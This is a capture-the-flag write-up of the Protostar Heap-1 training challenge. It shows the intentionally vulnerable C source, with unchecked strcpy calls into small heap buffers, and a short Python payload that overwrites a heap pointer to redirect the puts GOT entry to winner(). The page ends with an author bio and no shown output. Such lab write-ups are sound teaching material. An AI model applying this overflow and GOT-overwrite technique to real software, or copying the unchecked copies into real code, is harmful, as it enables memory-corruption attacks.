Protostar Heap-1 Writeup

writeup for protostar Heap-1 challenge

heap 1

Source code

The following is the source code for Heap 1 Challenge

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

Challenge

In this challenge we again need to call winner function, this program takes two inputs copies them to two buffers on heap of which address are stored in struct internet so we can overwrite puts function in global offset table to point puts after finding position of puts in global offset table

so writing our two payloads as

1
2
3
4
5
6
#!/usr/bin/env python

import struct
padding = 'AAAABBBBCCCCDDDDEEEE'
address_to_write = struct.pack('<I',0x08049774)
print padding+address_to_write
python -c 'import struct; print struct.pack("<I",0x8048494)'

so running our payload

Avatar
Sunny Mishra (codacker)
Student

A passionate geek who loves to break stuff and then make it again, with interests in cloud infrastructure, network security, reverse engineering, malware analysis and exploit development.

Related

comments powered by Disqus